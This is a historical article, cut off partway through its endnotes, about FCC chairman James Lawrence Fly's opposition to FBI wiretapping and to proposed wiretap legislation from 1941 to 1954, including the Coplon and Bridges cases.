Alabama introduced a bill to loosen restrictions on wiretapping. Hobbs was acting at the urging of Alexander Holtzoff, special assistance to the attorney general and “close associate” of J. Edgar Hoover. Holtzoff reportedly called himself “Hobbs’s brain trust.”7 Hobbs’s bill was simple: The head of any executive department of the United States could authorize a wiretap upon suspicion that a federal felony had been committed or was about to be committed. An opponent of the bill, Congressman Thomas Eliot of Massachusetts, wrote President Roosevelt for his views. Roosevelt answered that the Hobbs bill went “entirely too far,” but because the country was facing a possible war, he favored legalizing wiretapping to halt espionage and also would accept it to catch kidnappers. Roosevelt called the use of wiretapping in law enforcement “the most delicate problem in the field of democratic statesmanship.” The New York Times reprinted his letter in full, and the Hobbs bill became associated with the Roosevelt administration.8 Like Hobbs, Attorney General Robert Jackson favored legalizing wiretapping on suspicion of all federal felonies, although he would accept its being limited to espionage, sabotage, kidnapping, extortion, and narcotics violations. After hearings on the Hobbs bill began, Congressman Francis E. Walter of Pennsylvania introduced a bill to let U. S. commissioners or federal, district, or state judges authorize wiretaps for information useful in detecting or prosecuting felonies involving national defense. Both bills would make any evidence gained through wiretapping admissible in federal courts. The National Federal for Constitutional Liberties (described at the hearings as a nonprofit combination of church, civic, and labor groups) proposed that the FCC testify on the Hobbs bill to the House Judiciary Committee because the FCC was more closely related to communications than was any other agency. The committee also asked Fly to appear because he was chairman of the Defense Communications Board, and espionage, a prime defense concern, was the chief crime for which wiretapping was sought.9 Jackson testified first in executive session. Following his testimony, reporter Marquis Childs wrote that the wiretapping bill had “almost the unanimous support of the Republicans and of Conservative Southern Democrats” and was likely to pass.10 After Fly’s testimony, however, opinions began to shift; the committee asked Fly to return for a second session, and members “were greatly impressed by Fly’s detailed reasoning against the measure.”11 Joseph Rauh of the FCC legal department accompanied Fly and recalled his testimony with obvious relish. Fly began tentatively, he said, but then, “He blew that goddamn bill up to the ceiling. There wasn’t anything left of the wiretapping bill when he got done with it...We had a ball before the committee.”12 Roosevelt was on a vacation cruise in the presidential yacht accompanied by the attorney general when he was informed of Fly’s testimony. Rauh remembered meeting the next day with Fly, who had received a memo from Roosevelt asking for an immediate full report of Fly’s testimony on the president’s bill. “Perspiration was already on [Fly’s] forehead,” Rauh said; “soon I had exceeded it.”13 Rauh and Fly spent the next 24 hours preparing a response. Fly wrote that he had stayed away from policy questions and had focused on practical matters. He described the technical difficulties of wiretapping radio or telegraph circuits carrying “thousands of messages of hundreds of persons”; anyone engaging in such wiretapping would be immersed in an avalanche. Fly pointed out that both radio and telegraph companies kept records of their point-to-point messages, and getting those messages by subpoena - with possible liberalization of the subpoena power - would be more feasible than wiretapping. The Hobbs bill, Fly noted, did not limit wiretapping to the wires of a particular crime suspect. This “dragnet method” would require so many individual taps that agents would be drained away from duties more likely to get results. Finally the bill decreased the penalty for unauthorized use of wiretaps; making wiretaps easier with lesser penalties would harm defense by making military and industry personnel reluctant to use telephones.14 Roosevelt responded that the issues Fly raised were matters for the Department of Justice rather than the FCC and that the legislation should not be hampered by “technicalities.”15 The St. Louis Post-Dispatch urged that Fly’s views be made public and that Congress pay close attention to his warning about “the dangers of breaking down such a fundamental bulwark of American democracy as the individual’s right to privacy in his home” and “the perils of attacking freedom even at the edges.”16 Holtzoff was a rare voice defending Hobbs’s bill among more than 30 hearing witnesses who almost universally opposed it.17 The federal courts already had established several precedents relevant to the bill. First was the case of Olmstead v. United States, in which by a 5-4 decision the court held that wiretapping was not a violation of the Fourth and Fifth Amendments to the Constitution prohibiting unlawful search and seizure and self-incrimination. But the four dissenters were some of the Supreme Court’s most respected justices: Oliver Wendell Holmes Jr., Louis D. Brandeis, Pierce Butler and Harlan Fiske Stone. At the House hearings, Louis F. McCabe of the National Lawyers Guild cited other precedents: Weiss v. United States, in which the Supreme Court prohibited taps of intrastate calls and United States v. Polakoff, which declared evidence unusable when one party tapped a telephone conversation and the other party was unaware of the tap. Further, in Nardone v. United States, a bootlegging case, the court disallowed evidence by wiretapping in a federal court and in a second Nardone case prohibited use even of evidence uncovered through leads gained from taps.18 Labor unions were especially worried. Their witnesses spoke of fears that management and labor might tap phones to get information on each other and that taps might lead employers to discriminate against employees for union activities. Eugene Connolly of the American Labor Party said the Federal Corrupt Practices Act had listed many political party activities as felonies; thus, under the present bill, union election activities could become felonies, and suspicion of a felony could justify wiretapping. Connolly protested that Americans had a right to know of police activity taken against them; unless they were arrested, citizens might never learn they had been tapped and could not seek redress as they could from an improper search when property was confiscated. An attorney for the Congress of Industrial Organizations (CIO) said the bill’s provision for examining “other similar messages or communications” could be interpreted to justify tampering with the mails.19 Vagueness about legal procedures bedeviled the proposed bills - as it would bedeviled wiretapping legislation for decades. Several critics pointed out the Hobbs bill’s failure to specify how much information a federal official needed before authorizing a tap. Some congressmen worried that a cabinet official could get permission to wiretap upon slight supposition. Hobbs did not want to require specific evidence before authorizing a wiretap because this would slow the process; speed in installing a tap was essential, he said. The committee also considered whether the current threat of war justified wiretapping. In May, the New York Times reported that the administration was increasing pressure on Congress to pass the Hobs bill because the Department of Justice was handicapped in getting evidence about saboteurs and spies.20 Fly’s testimony, though it was in executive session and not printed, received considerable media attention. In addition to the St. Louis Post-Dispatch articles, the New York Times ran an article on him in May and cited him again that summer. A sizable story also appeared in the Baltimore Sun. Fly’s testimony may have received special weight because Judiciary Committee Chairman Hatton Sumners was, like Fly, a Texan, and the two had worked together during Fly’s days in the thirties as Tennessee Valley Authority General Counsel.21 Only one of the two House bills on wiretapping came to a vote; the Walters bill died along the way. Hobbs rewrote his bill, adding restrictions to tapping that presumably would make it more palatable, but even so in late June the House voted against it 154 to 146. Fly and Hoover entered into more than a decade of disputes that resulted in Fly’s having an extensive FBI file containing accusations that he had handicapped the Bureau’s defense effort. The file contains repeated mentions of Fly’s opposition to the Hobbs bill, his refusal to intercept commercial messages for the FBI, and his efforts to keep radio operators’ fingerprints out of the FBI’s permanent file. In 1950 FBI Assistant Director Mickey Ladd wrote the director: “It appears that Mr. Fly did everything in his power to delay making arrangements for the Bureau to monitor international communications prior to Pearl Harbor.22 As late as 1955 a memorandum placed in Fly’s file referred to his 1941 opposition to the Hobbs bill. Hoover aired their disputes in a book he authorized, The FBI Story, and Fly accused Hoover of furnishing inaccurate information about his stand on wiretapping to radio commentator Walter Winchell.23 During the following decade the FBI and successive attorneys general tried to loosen restrictions on wiretapping. While the national faced the treat of war, Roosevelt pragmatically sought ways to uncover espionage. In fact, in May 1940, long before Fly’s testimony and the bill’s defeat, the President had sent a memorandum to Jackson in which he recognized the possibility of civil rights abuse through wiretapping but said that the Supreme Court surely did not intend to forbid taps in cases involving national defense. Roosevelt said he reluctantly would permit wiretaps provided the attorney general authorized every tap. Jackson, however, ignored this proviso and handed over the authorization task to Hoover. Like many attorneys general under whom Hoover served, Jackson supervised Hoover’s activities only superficially; according to a later attorney general, Edward Levi, much oversight of the FBI had been “sporadic, practically nonexistent, or ineffective.”24 Such behavior increased Hoover’s freedom to wiretap. Wiretapping again became an issue for Fl in 1943 when Congressman Eugene Cox of Georgia became chairman of a House committee investigating the FCC. Admiral Stanford Hooper gave the committee 13 accusations against Fly, among them that “The Chairman of the Defense Communications Board (Fly) opposed legislation permitting wire-tapping which wold have permitted checking of the telephone to Japan before Pearl Harbor, and might have prevented the disaster.”25 Fly had to wait nine months to refute this charge before the committee. The committee counsel quoted Congressman Emanuel Celler to the effect that Fl probably was the only high government official who still opposed wiretapping. With perhaps more courage than wisdom, Fly answered the Pearl Harbor charge by quoting Senator Alben Barkley: “I have not heard of anybody stupid enough to think that the debacle at Pearl Harbor was caused by the failure of Congress to pass wire-tapping legislation.” Fly added: “Senator Barkley’s circle of acquaintances, apparently, did not extend far enough.” 26 In actuality, as FBI Assistant to the Director Alan Belmont later acknowledged, the attorney general had granted authority to install “a technical surveillance on the telephonic communications between Hawaii and Japan” on 22 October 1941, and operation began on 3 November.27 Four days before the attack the FBI reported to naval intelligence a telephone message from the Japanese consulate saying that the consul general was burning “all of his important papers,” an indication of interrupted diplomatic relations.28 On 5 December a surveillance report described a phone call between Honolulu and Japan involving weather conditions, movement of aircraft, and “types of ships in Hawaii.” The FBI relayed this information to military authorities on the evening of 6 December 1941.29 Fly can hardly be blamed for either a lack of wiretapping or the inability to predict the Pearl Harbor attack. After the war President Truman accepted Attorney General Tom Clark’s recommendation that Roosevelt’s letter authorizing wiretaps remain in effect. Fly continued his fight against wiretapping after he left the FCC in 1944 and opened a law firm. His friend Joseph Swindler, who replaced Fly as TVA general counsel, said that Fly “missed the limelight he had enjoyed as Chairman of the FCC. This is a post-occupational hazard common to all former commission chairmen.”30 Perhaps that was the reason Fly accepted a position in 1946 as a director of the American Civil Liberties Union. In that capacity he became involved in the case of Judith Coplon.31 On 4 March 1949, FBI agents arrested Coplon, a Justice Department employee who had espoused Communist causes while a student at Barnard. In her purse were short versions of FBI documents from the Justice Department, including some from the FBI. The bureau maintained that she was about to give them to Valentin Gubitchev, a Russian engineer at the United Nations. At the Washington trial the charge was copying,taking, concealing, and removing documents of the Department of Justice. In New York, she was tried jointly with Gubitchev for conspiring to defraud the United States and to deliver defense information to a citizen of a foreign nation. One document in her purse named an agent in a Soviet trading company who supposedly was working for the FBI. She declared her innocence and at first said that she and Gubitchev were in love - a story difficult for the jury to believe when the prosecution presented evidence that she had spent nights in hotels with a Justice Department attorney during the period of her meetings with Gubitchev.32 The month of Coplon’s arrest - when wiretapping was not yet an issue in the case - Fly testified before a special committee of the New York County Criminal Courts Bar Association. Fly called New York Governor Thomas E Dewey the “founding father” of legalized wiretapping in the state and said the ACLU had asked the governor to tell New Yorkers how much wiretapping was occurring in their state.33 That same month Fly (and others, including Joseph Rauh) signed a letter to Senator Pat McCarran, Chairman of the Senate Judiciary Committee, saying that both Americans for Democratic Action ad the ACLU opposed wiretapping in any form. They were responding to pending bills - one of them McCarran’s to loosen restrictions on wiretapping. FBI Assistant Director D. Milton Ladd cited this letter in a lengthy memo to Hoover about Fly’s criticism of the Bureau.34 Two months later - while the Coplon trial was in full swing - Fly, as attorney for the New York County Criminal Courts Bar Association, petitioned the U.S. attorney general to ensure the enforcement in New York of Section 605’s ban on wiretapping. According to a survey cited in the petition, local New York police had engaged in more than 300 instances of authorized wiretapping during 1948, along with uncounted unauthorized taps.35 As the Coplon case continued, wiretapping became only one of the prosecution’s problems and the FBI’s embarrassments. First, the 30 agents pursuing Coplon on the night of her arrest had not waited for her to pass the summaries of documents to Gubitchev; therefore she had not actually committed espionage Second, no one had secured a warrant to arrest her. Third (and most important to Fly), leads against her were based on taps of her home. The FBI continued the taps after her arrest and even recorded conversations between Coplon and her attorney, Archibald Palmer.36 Midway in her trial, Coplon’s attorney demanded that the FBI documents Coplon had copied for Gubitchev be opened in court, thus starting a chain of revelations about FBI wiretaps. FBI agent Robert J. Lamphere, the agent who supervised her arrest, feared that “to release the basic file reports might not only endanger security and compromise informants but also bring to light many unsubstantiated allegations which would do no one any good.” He believed that Palmer expected the government to drop the case rather than reveal the contents of the files.37 But the judge ordered them opened, and Palmer read many of them aloud. The files contained reports by informants that major celebrities were Communist Party members, including actors Fredric March and Edward G. Robinson, singer Paul Robeson, and writer Dorothy Parker. Other screen stars supposedly had helped the Communist cause. One informant noted that actress Helen Hayes had portrayed a Soviet teacher in a skit at a rally for Russian relief. According to the Washington Times Herald, some of the information definitely came from wiretaps. During the trial Fly wrote his grandchildren of the pain caused by FBI allegations: Yesterday the eminent playwright, Charles MacArthur, was in my office. His wife the charming and talented Helen Hayes, was at home crying. . . . Some FBI reports containing malicious gossip as to her loyalty had been aired in the Washington trial of Judith Coplon. A number of other prominent and loyal people were smeared in like manner.38 Coplon’s attorney early on tried to learn the source of the FBI’s original suspicion of his client. He suspected wiretapping, but FBI agents on the witness stand at first denied this. The bureau then destroyed recordings of the taps before the court could hear then. Fly, for the ACLU, wrote an amicus curiae brief seeking a new trial and citing as a reason “the conduct of government attorneys and FBI representatives who, by a process of concealment and infantile denial, misled the trial court on this vital issue and in the teeth of their knowledge of the true facts.”39 Fly sent a letter to the New York Times accusing the FBI of violating the Criminal Code by destroying recordings of the taps, which were evidence. The violation seemed clear since the bureau’s order for the destruction gave as a reason “the immediacy of her trial.” The order also authorized getting rid of “all administrative records in the New York office” and was signed “OK-H.” Fly noted that the printed form included the words: “To be destroyed after action is taken, and not sent to the files which implied, Fly said, “a routinized scheme and practice of destroying public records.”40 Meanwhile, a petition asking for a public investigation of the FBI was sent to the president of the U.S. Senate, the Speaker of the House and chairs of both the House and Senate judiciary committees. Both FBI Assistant Director Louis Nichols and columnist Walter Trohan named Fly as the reputed author, though copies of the petition in both Fly’s papers and his FBI file are unsigned. Fly was definitely the author of a letter to the U.S. solicitor general in which he repeated the charge that FBI agents had by implication and evasion misled the court in Coplon’s Washington trial. Nichols, after talking with Hoover, urged the solicitor general to write a strong letter to Fly rebutting the charge. Nichols repeatedly complained to the FBI’s second-in-command, Clyde Tolson, that the solicitor general’s rebuttal was not strong enough, that it should “tie into Fly and nail his lies once and for all.”41 Coplon was found guilty at both her Washington and New York trials, and both the Washington and New York federal courts of appeal agreed to hear the case. New York Judge Learned Hand’s court set aside the lower court’s verdict, though not simply because evidence came from taps. He stated that although “the guilt is plain,” the lower court judge (at the FBI's urging that the wiretaps might involve national security) had refused to let Coplon see the records of some wiretaps after he read them and decided they were irrelevant. Thus, she had been denied information that might have helped her defense. Further, she had been arrested without a warrant, which made the evidence in her purse inadmissible. Judge Hand left the indictment standing, however, upon the possibility that a way might be found to hold a new trial excluding all evidence and leads resulting from wiretaps.42 In Washington, Judge Wilbur K. Miller, after agreeing that the evidence sustained the jury’s verdict, remanded the case because the wiretaps of telephone conversations between Coplon and her attorney deprived her of the right to counsel under the Bill of Rights. The indictment was not dropped for 16 years.43 During the Coplon case, Fly wrote in the Washington Post that wiretapping both nullified the law and made blackmail easier by fertilizing “the breeding ground of crime itself. . . Even the record of official New York taps shows 95 percent involve gambling, bookmaking, prostitution, the richest field for blackmail and extortion.”44 The next day, Attorney General J. Howard McGrath issued a statement saying that the FBI would continue its wiretaps and that he was planning an “anti-tygoon” conference about techniques for catching subversives and criminals. The Post editorialized that if this was supposed to be a response to Fly’s article, it was a poor one. The Post admitted that methods like wiretapping might make the FBI more efficient in catching saboteurs; so would rifling the mails, unrestrained searches, suspension of habeas corpus, the thumbscrew and the rack, “but every free and civilized society has forbidden its police to use such methods.”45 Fly became involved in another case involving the FBI’s wiretaps when labor leader Harry Bridges asked Fly to represent him in 1949. Fly had met Bridges on a presidential fact-finding commission some years earlier and recalled Bridges as . . . a man of extraordinary competence whom all will admit has done a remarkable job in improving the economic and working conditions of the West Coast Longshoremen. . . .[M]any of his enemies. So forceful have been that the full power of the United States government has been turned loose against this man for fifteen years.46 When Bridges discovered that the FBI was wiretapping his hotel room in 1940, he typed notes, tore them up, and planted them in his wastebasket. He then moved to a nearby hotel and used binoculars to watch the FBI piecing the notes together. The union leader had already undergone six investigations when Fly took his case. Congressman Hobbs, author of the 1941 wiretapping bill that Fly testified against, in 1940 had secured passage of a law that would deport Bridges. The case eventually went to the Supreme Court where the deportation order was canceled. After that decision in 1945 Bridges became a U.S. citizen, but four years later the government filed a civil action to cancel his citizenship and deport him. Bridges was accused of lying at his naturalization hearing in saying he had never been a Communist. At this point Bridges asked Fly to be his attorney.47 William Fitts, one of Fly’s law partners, remembered talking with him about whether the law firm should be associated with the case. Fly said, “I think that this is a civil liberties issue . . .[I] llegal means have probably been used here, and I feel very strongly on this question of individual rights and wire-tapping and I know that this might hurt the business.” Fitts told Fly: “If you feel it’s the right thing to do, go ahead and do it.”48 Fly, as Bridges’s attorney, promised to call FBI agents as witnesses to determine whether evidence had been obtained illegally through taps. He also defended Bridges on the basis that the statute of limitations (three years) had expired. Four years later, in June 1953, the Supreme Court ruled 4-3 against the government, citing expiration of the statute of limitations. Though Fly represented Bridges in only one court appearance, he suffered for it for almost a decade. Bridges was a factor in Fly’s being named a “concealed Communist” by a loyalty board and also in Fly’s effort to get a television station license.49 Meanwhile Fly had continued his campaign against wiretapping in print. He demonstrated to readers of Look magazine how easily and cheaply a tap could be installed. In the New Republic Fly argued that wiretappers “violate every sacred relation established by God and protected by law: husband and wife; parent and child; minister and parishioner; doctor and patient; lawyer and client.”50 He also kept his sense of humor, writing a tongue-in-cheek complaint to the FCC that telephone companies were overcharging many of their customers: subscribers whose lines were being tapped should at least be entitled to party line rates! To prevent destruction of government records, wiretappers should send records of their taps to the FCC; these would be pressed into bricks, generating enough to erect a new FCC building. In a more serious vein, Fly criticized attorneys for their apathy toward tapping in the Harvard Law School Record: The challenge is to the bar. Has it the courage? If not, the bar may awaken too late to face the fact . . .that our liberties have been permanently scarred . . .What is the bar going to do, or would you rather play golf?51 Fly also discussed wiretapping in two articles for the Saturday Review during the 1950s. In his review of Max Lowenthal’s The Federal Bureau of Investigation, he described “Suppression by Smear,” noting how Hoover discouraged citizens from speaking out by threatening them with unfavorable stories from journalist Walter Winchell and other.52 Six years later, in a review of Don Whitehead’s The FBI Story, he castigated Hoover for wiretapping “in the beguiling name of ‘security.’”53 The years 1953 and 1954 brought arguments over wiretapping to a climax as the previous decade had shown that wiretapping needed more detailed regulation than was anticipated in 1941. The judiciary committees in both House and Senate appointed subcommittees to hold hearings, each subcommittee considering four bills. The Senate hearings showed that law enforcement officials felt such a need for wiretap evidence that could be used in court that they were finding ways to bypass federal court decisions, civil libertarians, and even existing federal law. In the previous 16 years, Congress had considered more that 30 bills involving wiretapping, but only four had passed even one house. But more than 30 states allowed evidence gained by wiretapping. While Hoover had told the attorney general that no more than 200 FBI wiretaps were ever in place at any one time, according to the Lawyers Guild, 58,000 taps were authorized under the New York statute in 1952 alone. New York District Attorney Miles McDonald testified that policemen were buying their own equipment for tapping and using illegal taps to shake down bookmakers. Wiretapping was certainly widespread.54 Congress was exerting pressure to expand the list of crimes for which wiretapping could be used. House Subcommittee Chairman Kenneth B. Keating of New York sponsored a bill to allow federal agencies involved with national security to wiretap when they were checking on treason, sabotage, espionage, “or similar offenses”; the information could be used in court, but the agencies would be required to get approval from a federal judge before tapping and from the attorney general before disclosure. Some proposed bills would permit tapping for crime detection, making it possible to tap wires of people who had not yet committed an offense - a topic much discussed.55 The House hearings included a letter from Attorney General McGrath about the eagerness of lawyers - after the Coplon verdicts - to learn whether their clients had been tapped so they might free them as Coplon was freed. To prevent this, McGrath found it necessary in cases involving wiretaps to hold pretrial hearings to determine that no material evidence came from taps.56 As in 1941, the process of getting approval to institute a tap prompted much debate in the House hearings. Who should be able to authorize taps? Requiring a court order would delay installing the tap and make it easier to leak information about it. In New York, where state law required such authorization, a stenographer with a boyfriend on the police force had leaked information about a wiretap so that it reached the bookmaker who was being tapped. Deputy Attorney General William P. Rogers favored simply letting the attorney general approve wiretaps: “the proper party to trust is the Attorney General of the United States.” Another witness was Joseph L. Rauh, who had attended the earlier wiretapping hearing with Fly in 1941. He submitted a statement from Americans for Democratic Action proposing that only a Supreme Court justice of the chief judge or a circuit court of appeals should authorize taps, and only after approval by the attorney general.57 Which crimes would justify taps? Most bills limited wiretaps to matters concerning national security, but Congressman Emanuel Celler offered a bill permitting taps for crimes involving “the safety of human life” (which presumably would include kidnapping). Keating and Celler both specified that wiretapping could be used in national security were threatened by treason “or in any other manner.” A witness from the American Federation of Labor feared this provision was so broad that it cold be invoked to settle labor disputes.58 Argument arose about whether a wiretap violated the Fifth Amendment by forcing persons to testify against themselves. Would a person’s own words on the tap be a form of confession? Witnesses debated whether the Fourth Amendment was violated when the tap produced evidence of a crime that had not been cited in the authorization for the tap. New York District Attorney Miles McDonald testified that in his state, “as long as the tap is lawful when we make it and we find evidence of other crimes . . . we are entitled to use the evidence.” This raised again the issue of whether leads - not just evidence itself - from wiretaps could be used in federal court.59 After the House hearings, Majority Leader Charles Halleck proposed that the sole authority for granting permission to tap should be the head of the FBI, but this proposal died quickly. In April, 1954, a wiretapping bill requiring a federal judge’s advance approval passed the House by a vote of 378 to 10.60 Fly, meanwhile took his case against wiretapping to television. Between the House and Senate hearings Halleck and Fly reached a national television audience when Edward R. Murrow asked them to discuss wiretapping on See It Now. The two men debated by telephone with a camera on each, and approximately an hour of argument was edited to about 15 minutes. On the videotape Fly smiles often and gives every appearance of enjoying the conflict. He dominates the conversation and reduces Halleck to saying that the FBI had held information about citizens “inviolate - no citizen had been harmed.”61 In a summary of the program, placed in Fly’s FBI file, the Bureau’s M.A. Jones wrote, “Fly was extremely vindictive in his attitude towards the Bureau, and Halleck had trouble interrupting to rebut his statements.”62 After the program, Chairman Keating and Fly spoke, and Fly sent Keating his views. By this time Fly had relaxed his stance against wiretapping somewhat. He still thought “American democracy loses more than it gains” by authorizing wiretapping, but with appropriate safeguards he would accept the ACLU position, which approved wiretapping only in cases of “treason, sabotage, espionage, and kidnapping or threats of kidnapping.”63 The ACLU had prepared an elaborate official position that included safeguards to civil liberties: All requests for taps would come from the attorney general and could be approved by only one federal judge in each district, selected by the Supreme Court (to prevent shopping around for a compliant judge). All copies of taps would be made available to the defendant, and no tap could be authorized for more than 90 days without a petition for extension.64 In his letter to Keating, Fly added a proposal that went beyond the ACLU position. Fly urged that any bill, if passed by Congress, should expire after two years and would need to be reenacted after a study of its effects.65 Fly represented the ACLU before the Senate subcommittee in hearings on four bills to loosen restrictions on wiretapping. His forthright testimony illustrates his ability to ignore personal consequences. Two events had occurred that made his stand on wiretapping both a personal and financial risk. First, in 1951, the Tennessee Valley Authority Loyalty Board issued charges against its general counsel, Joseph Swidler, an attorney who had worked with Fly at TVA during the 1930’s. Two charges against Swidler concerned his association with Fly, who was “reputed to be a concealed Communist.” Fly protested directly to President Truman “in the capacity of a responsible citizen whose most prized possession - his good name, and the public respect of his character and loyalty - is at stake.” He attributed the accusation to the fact that he has “slugged it out with John Edgar Hoover on some of his high-handed methods and especially on his widespread illegal conduct of wire-tapping.”66 Swidler was late fully cleared and became chairman of the Federal Power Commission.67 In testifying, Fly also risked losing a business enterprise. Fly headed a company that had applied to the FCC for a television station license to operate Channel Seven in Miami. The American Legion, it its national publication Firing Line, raised questions about his qualifications because - among other things - he had opposed wiretapping and defended Harry Bridges and Judith Coplon. A Legion post in Miami sent the Firing Line to all FCC commissioners, the Florida congressional delegation, Communist hunter Senator Joseph McCarthy, and chairmen of the Senate Internal Security Subcommittee and the House Un-American Activities Committee. Fly said there had been calls for an investigation, and he felt “paralyzed helplessness.”68 Fly showed no “paralyzed helplessness” in his no-holds-barred Senate testimony, however. After describing the ACLU position, he said that although the ACLU - and he himself - generally opposed wiretapping, if it was to be adopted, the most important safeguard was the requirement for a court order. Letting the attorney general or other prosecutor along approve a wiretap granted too much power, and “power is a very heady medicine.” To the objection that it was too difficult to reach federal judges to get their approval, Fly replied that it customarily would take no more time to reach a judge than to install a tap. Fly also objected to a change in the law to make it possible to try Judith Coplon again; he called it an “ex post facto effect” and “very serious business.”69 Fly challenged the attorney general’s contention that Section 605 permitted wiretaps so long as information from them was not “divulged” outside the FBI; Fly held that Section 605’s ban against divulging “to any person” should be taken literally. As he had written in 1949, the attorney general’s interpretation of “divulging” and “using” was “wishful thinking,” a “dangerous pastime for attorneys general.”70 In 1968 the law was amended to permit law enforcers to divulge legally acquired information from taps among themselves.71 Responding to a statement that an innocent person need not worry about being tapped, Fly answered: "By that pseudo line of logic you could dispose of the whole Bill of Rights. I don’t expect to be on trial in a criminal court tomorrow, what do I care about trial by jury, due process of law, and that sort of thing? If I take that attitude, the whole Bill of Rights can be swept out of the window."72 The Senate Judiciary Committee in August voted 7-7 on sending the bill forward, which killed it for the time being, but in November Attorney General Herbert Brownell vowed to continue fighting for more freedom to tap.73 Since Fly’s day, wiretapping has become more accepted, and laws regulating it have become more complex. Some provisions that Fly championed became policy. Taps require a court order from specified judges except for surveillance of foreign agents and some emergencies. The length of time a tap can continue without renewal of the court order is even shorter than the ACLU advocated: 3 days rather than 90. Rules limit the destruction of wiretap records. The number of crimes for which wiretaps can be used and the types of judges who can authorize taps have been expanded, however.74 It is hard to measure Fly’s influence. Certainly he kept the issue before the American people, and both times when he testified against expanding wiretapping, Congress took the course he favored. He paid a personal price for his success, however. Fly’s daughter said he never received a cancellation of charges made by the TVA Loyalty Board. The struggle for the license to operate the Miami television station lasted into the 1960’s, long after Fly had withdrawn as an applicant for multiple reasons - some not related to his political views. His campaign against wiretaps offers the too rare spectacle of an individual willing to endure personal risks to fight for his beliefs.75 Fly apparently enjoyed a good fight. In the middle of the Cox hearings in 1943, he told a reporter, “If I weren’t lashed at every week or so, life would be dull.”76 And in notes for an autobiography addressed to his grandchildren, he wrote: “Don’t think I’ve been a professional worrier except in the sense that I’ve enjoyed worrying some powerful guys who are doing things that may affect you.” As he told his grandchildren, one aspect of his life he deplored was his “failure in teaching John Edgar Hoover the Bill of Rights.”77 James Lawrence Fly, The FBI, and Wiretapping by Mickie Edwardson (Mickie Edwardson is a professor emerita of journalism and communications from the University of Florida.) 1 Gregory E. Birkenstock, “The Foreign Intelligence Surveillance Act and Standards of Probable Cause: An Alternative Analysis,” Georgetown Law Journal 80 (1992): 843. 2 Dan Carney, “Broad Anti-Terrorism Measures Stall in Task Force,” Congressional Quarterly Weekly Report, 3 August 1996, 2202-2; Juliana Gurewald, “Bill on Encryption Exports Gets Panel Approval,” Congressional Quarterly Weekly Report, 28 June 1997, 1520; Mike Mills, “Privacy Groups Assail FBI’s Wiretapping Plan,” Washington Post, 3 November 1995, sec. D, p.1. 3 United States Code Service (Lawyers Edition), title 18, secs. 2510-21, title 47, sec. 605, title 50, sec. 1801-11 (Rochester, 1993-1996). 4 J. Edgar Hoover, confidential memorandum, 24 August 1936, in From Secret Files of J. Edgar Hoover, ed. Athan Theoharis (Chicago 1991) 18081; Hoover to Fly, 7 September 1940, 11 October 1940, 22 November 1940; Fly to Hoover 7 December 1940, all in Fly Papers, Rare Book and Manuscript Library, Columbia University, New York City. 5 James Lawrence Fly, “Threat to Liberty, Defiance of Law Seen in FBI Wire-Tapping,” Washington Post, 7 January 1950, sec. A, p. 9. 6 Fly to Roosevelt, 27 March 1941, personal Collection of James Lawrence Fly Jr. (hereafter Fly Collection), 2 (emphasis in Fly’s original). 7 Nathan Robertson, “Undercover Pressure Exerted to Legalize Wire Tapping,” PM, 27 March 1941, 10. 8 U.S. House Subcommittee no. 1 of the Committee on the Judiciary, To Authorize Wire Tapping. Hearings on H.R. 2266, H.R. 3099, 77th Cong., 1st sess., 1941, 1, 257; “President Advocates Limited Wire Tapping in Defense Sabotage and Kidnapping Cases,” New York Times, 26 February 1941, p.1. 9 U.S. House, To Authorize Wire Tapping, 17, 1-2-202; “Undercover Pressure,” PM, 27 March 1941, 10; Fly to Roosevelt 27 March 1941, 2. 10 Marquis W. Childs, “House Committee Approval Likely on Wire-Tapping,” St. Louis Post-Dispatch, 18 March 1941, sec. A, p.3. 11 Marquis W. Childs, “Head of U.S. Communications Board Vigorously Opposes Wire Tapping,” St. Louis Post-Dispatch, 26 March 1941, sec. A, p.10. 12 Joseph Rauh, interview by author, tape recording, Washington, DC., 28 December 1989. 13 ”Roosevelt Puts to Sea on Short Vacation Cruise,” St. Louis Post-Dispatch, 22 March 1941, sec. A, p.2; Rauh interview. 14 Fly to Roosevelt, 27 March 1941. 15 Roosevelt to Fly, memorandum, 1 April 1941, Fly Papers. 16 ”A Warning on Wire-Tapping,” St. Louis Post-Dispatch, 27 March 1941, sec. C, p.2. 17 U.S. House, To Authorize Wire Tapping, 5-14. 18 Olmstead v. United States, 277 US 438 (1927); Weiss V. United States, 308 US 321 (1939); United States v. Polakoff, 112 F. (2d) 888 (C.C.A. 2d, 1940); Nardone v. United States, 302 US 379 (1937); Nardone v. United States, 308 US 338 (1939); U.S. House, To Authorize Wire Tapping, 42, 79, 166. 19 U.S. House, To Authorize Wire Tapping, 102, 117, 125, 85. 20 Ibid., 24-28, 50; “Asks Uniformity on Sabotage Guilt,: New York Times, 9 May 1941, 15. 21 ”Fly of FCC Opposes Wiretapping Power,” New York Times, 20 May 1941, p. 17; James B. Reston, “Congress Finishes Fund Bills to Set 33 Billion Record,: New York Times, 1 July 1941, p. 1; Paul W. Ward, “Tangle Develops over Wire Tapping,” Baltimore Sun, 22 March 1941, clipping, Fly Papers; Fly to John Lord O’Brian, 14 July 1953, Fly papers. 22 Legislative Reference Service, Library of Congress, Digest of Public General Bills with Index, No. 4, 77th Cong., 1st sess (3 January to 30 June 1941), 172, 259; Reston, “Congress Finishes Fund Bills,” 1; see also Federal Bureau of Investigation, File on James Lawrence Fly, No. 62-73756 (hereafter Fly File), including V.P. Keay to H.B. Fletcher, memorandum, 16 November 1949; and Mr. Ladd to the Director, memorandum, 11 January 1950. 23 Fly File (deleted) to A.M. Belmont, memorandum, 10 January 1951; D.M. Ladd to the Director, memorandum, 28 August 1951; A.J. Belmont to L.V. Boardman, memorandum, 18 November 1955; Don Whitehead, The FBI Story: A Report to the People (New York, 1956), 187-88; James Lawrence Fly, “A Wholesome Thing,” Saturday Review of Literature, 23 December 1950, 15, 37. 24 Roosevelt to Jackson, memorandum, 2 May 1940, quoted in D.M. Ladd, “Memorandum for the Director, Re: Analysis of Criticisms of Bureau by James L. Fly,” 28 November 1949, 2, Fly File; Francis Biddle, In Brief Authority (Garden City, 1962), 167; Congress, Senate, Intelligence Activities Hearings Before the Select Committee to Study Governmental Operations With Respect to Intelligence Activities, 94th Cong., 1st sess., vol. 6, 1975, 315. 25 I.F. Stone, “Mr. Biddle is Afraid,” Nation, 22 May 1943, 735-736; Congress, House, Select Committee to Investigate the Federal Communications Commission, untitled press release, 78th Cong., 2d sess., 11 July 1943, Fly Collection. 26 U.S. House, Select Committee to Investigate the Federal Communications Commission, Hearings on Study and Investigation of the Federal Communications Committee Acting Under H. Res. 21, 78th Cong., 2d 